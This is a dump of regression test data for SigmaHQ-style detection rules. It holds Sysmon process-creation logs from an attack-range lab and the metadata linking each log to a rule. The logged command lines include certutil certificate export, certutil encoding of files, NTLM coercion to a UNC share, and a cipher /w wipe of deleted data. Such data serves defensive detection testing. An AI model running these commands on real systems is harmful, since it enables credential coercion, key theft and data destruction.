"Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": 
"ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 17:04:22.010", "ProcessGuid": "5AA13A44-0316-68FD-8535-000000004002", "ProcessId": 3980, "Image": "C:\\Windows\\System32\\certutil.exe", "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", "Description": "CertUtil.exe", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "CertUtil.exe", "CommandLine": "certutil -encode file.bat file_.base64", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", "ParentProcessId": 6304, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode/info.yml ================================================ id: 70e4269e-9d3c-4bfb-ad84-0b63124ad0a2 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a title: File Encoded To Base64 Via Certutil.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.evtx ================================================ FILE: 
regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T17:04:22.017117Z" } }, "EventRecordID": 11570013, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 17:04:22.010", "ProcessGuid": "5AA13A44-0316-68FD-8535-000000004002", "ProcessId": 3980, "Image": "C:\\Windows\\System32\\certutil.exe", "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", "Description": "CertUtil.exe", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "CertUtil.exe", "CommandLine": "certutil -encode file.bat file_.base64", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", "ParentProcessId": 6304, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": 
"ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/info.yml ================================================ id: 7033fe69-1fd7-4da2-b525-222c1b087107 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: ea0cdc3e-2239-4f26-a947-4e8f8224e464 title: Suspicious File Encoded To Base64 Via Certutil.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T17:05:11.334152Z" } }, "EventRecordID": 11585346, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 17:05:11.327", "ProcessGuid": "5AA13A44-0347-68FD-8B35-000000004002", "ProcessId": 6780, "Image": "C:\\Windows\\System32\\certutil.exe", "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", "Description": "CertUtil.exe", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft 
Corporation", "OriginalFileName": "CertUtil.exe", "CommandLine": "certutil -encode C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Network\\sr011.xml C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Network\\conv.xml", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", "ParentProcessId": 6304, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location/info.yml ================================================ id: bfbc8981-818e-4de5-b7a4-1bb3d4a08792 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 82a6714f-4899-4f16-9c1e-9a333544d4c3 title: File In Suspicious Location Encoded To Base64 Via Certutil.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": 
"Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T17:23:42.049726Z" } }, "EventRecordID": 11818106, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 17:23:42.043", "ProcessGuid": "5AA13A44-079E-68FD-0236-000000004002", "ProcessId": 2456, "Image": "C:\\Windows\\System32\\certutil.exe", "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", "Description": "CertUtil.exe", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "CertUtil.exe", "CommandLine": "certutil -p secret_password -exportPFX root 1c6119aff8414c91487c4e02d18dd73D c:\\cert.pfx", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", "ParentProcessId": 6304, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_export_pfx/info.yml ================================================ id: 387ea4f5-f74d-4b14-a1a7-db8c97fb56c2 description: N/A date: 2025-10-24 
author: SigmaHQ Team rule_metadata: - id: 3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5 title: Certificate Exported Via Certutil.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T17:26:24.815458Z" } }, "EventRecordID": 11867155, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 17:26:24.808", "ProcessGuid": "5AA13A44-0840-68FD-1336-000000004002", "ProcessId": 4424, "Image": "C:\\Windows\\System32\\certutil.exe", "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", "Description": "CertUtil.exe", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "CertUtil.exe", "CommandLine": "certutil -syncwithWU \\\\10.0.1.14\\my-share", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": 
"SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", "ParentProcessId": 6304, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/info.yml ================================================ id: 32397458-1d93-45ee-a3c8-9efebb81d9d1 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 6c6d9280-e6d0-4b9d-80ac-254701b64916 title: Potential NTLM Coercion Via Certutil.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T17:27:26.975358Z" } }, "EventRecordID": 11886324, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": 
"S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 17:27:26.974", "ProcessGuid": "5AA13A44-087E-68FD-1A36-000000004002", "ProcessId": 6788, "Image": "C:\\Windows\\System32\\chcp.com", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "Change CodePage Utility", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "CHCP.COM", "CommandLine": "chcp", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=0489A9D0B4342F9C87C03510E0073898864946A5,MD5=0714C0100E008D00EC82E7B549595F69,SHA256=A807B535F7176642FC87911D185C10B00981388CDA68F5B8E2FF4C73FF514352,IMPHASH=75FA51C548B19C4AD5051FAB7D57EB56", "ParentProcessGuid": "5AA13A44-087E-68FD-1936-000000004002", "ParentProcessId": 8248, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "cmd.exe /c chcp", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup/info.yml ================================================ id: 30e3935a-84b4-45ad-85e2-c209c57dbfa7 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 7090adee-82e2-4269-bd59-80691e7c6338 title: Console CodePage Lookup Via CHCP regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.json ================================================ { "Event": { 
"#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T17:28:28.958645Z" } }, "EventRecordID": 11905446, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 17:28:28.957", "ProcessGuid": "5AA13A44-08BC-68FD-2336-000000004002", "ProcessId": 8208, "Image": "C:\\Windows\\System32\\chcp.com", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "Change CodePage Utility", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "CHCP.COM", "CommandLine": "chcp 936", "CurrentDirectory": "C:\\Users\\Administrator\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=0489A9D0B4342F9C87C03510E0073898864946A5,MD5=0714C0100E008D00EC82E7B549595F69,SHA256=A807B535F7176642FC87911D185C10B00981388CDA68F5B8E2FF4C73FF514352,IMPHASH=75FA51C548B19C4AD5051FAB7D57EB56", "ParentProcessGuid": "5AA13A44-08B2-68FD-2136-000000004002", "ParentProcessId": 3204, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch/info.yml ================================================ id: 
a67c0d0c-3b40-4fef-a39d-5bd528255d90 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: c7942406-33dd-4377-a564-0f62db0593a3 title: Suspicious CodePage Switch Via CHCP regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T17:32:06.432272Z" } }, "EventRecordID": 11973062, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 17:32:06.421", "ProcessGuid": "5AA13A44-0996-68FD-3A36-000000004002", "ProcessId": 2876, "Image": "C:\\Windows\\System32\\cipher.exe", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "File Encryption Utility", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "CIPHER.EXE", "CommandLine": "cipher.exe /w:C:", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", 
"TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=5747F6E48C899AEE54E4153AC8A8B61E741F45E2,MD5=3D7D3EEDD055EFF0C7995491466A7EB7,SHA256=6E04AD8A79A7D794438E197606AB78B079929D941FE99DD5159702694F7ACE77,IMPHASH=E83B4C457AFD5EEA31874B00E8A3A956", "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", "ParentProcessId": 6304, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/info.yml ================================================ id: 18b75b44-f2a5-497f-934c-9d0941f57f0f description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 4b046706-5789-4673-b111-66f25fe99534 title: Deleted Data Overwritten Via Cipher.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T17:33:00.990279Z" } }, "EventRecordID": 11989935, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": 
"ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 17:33:00.989", "ProcessGuid": "5AA13A44-09CC-68FD-4336-000000004002", "ProcessId": 1060, "Image": "C:\\Windows\\System32\\clip.exe", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "Clip - copies the data into clipboard", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "clip.exe", "CommandLine": "clip", "CurrentDirectory": "C:\\Users\\Administrator\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=F3F4BE6C6A42072CBB74D05E3EBE285FB24C56CF,MD5=61C8E9DEC5E3AEA798C2862CD4565CCA,SHA256=ABAF131EA0A608072574D7C77A6EE5175CA13E361DE18146A54A78CBD868BFF3,IMPHASH=FFEDF33A1AF6412E26F1F659C12D5FF7", "ParentProcessGuid": "5AA13A44-08B2-68FD-2136-000000004002", "ParentProcessId": 3204, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_clip_execution/info.yml ================================================ id: 4ea9d42e-437f-4c56-8173-bdd8cafd72be description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: ddeff553-5233-4ae9-bbab-d64d2bd634be title: Data Copied To Clipboard Via Clip.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.evtx ================================================ FILE: 
regression_data/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T13:04:38.507492Z" } }, "EventRecordID": 8302863, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 13:04:38.497", "ProcessGuid": "5AA13A44-CAE6-68FC-A62F-000000004002", "ProcessId": 7816, "Image": "C:\\Windows\\System32\\cmd.exe", "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", "Description": "Windows Command Processor", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "Cmd.Exe", "CommandLine": "cmd /c assoc", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", "ParentProcessId": 6304, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } 
================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution/info.yml ================================================ id: 1a0606d6-3470-45e5-aeea-16098357e709 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 3d3aa6cd-6272-44d6-8afc-7e88dfef7061 title: Change Default File Association Via Assoc regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T13:13:54.628884Z" } }, "EventRecordID": 8447015, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 13:13:54.622", "ProcessGuid": "5AA13A44-CD12-68FC-E62F-000000004002", "ProcessId": 9088, "Image": "C:\\Windows\\System32\\cmd.exe", "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", "Description": "Windows Command Processor", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "Cmd.Exe", "CommandLine": "cmd /c \"dir 
/s\"", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", "ParentProcessId": 6304, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmd_dir_execution/info.yml ================================================ id: 952d9279-9d38-4dc6-b32e-4b470cf99fc7 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 7c9340a9-e2ee-4e43-94c5-c54ebbea1006 title: File And SubFolder Enumeration Via Dir Command regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_cmd_launched_with_hidden_start_flag/5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-04T07:01:44.982629Z" } }, 
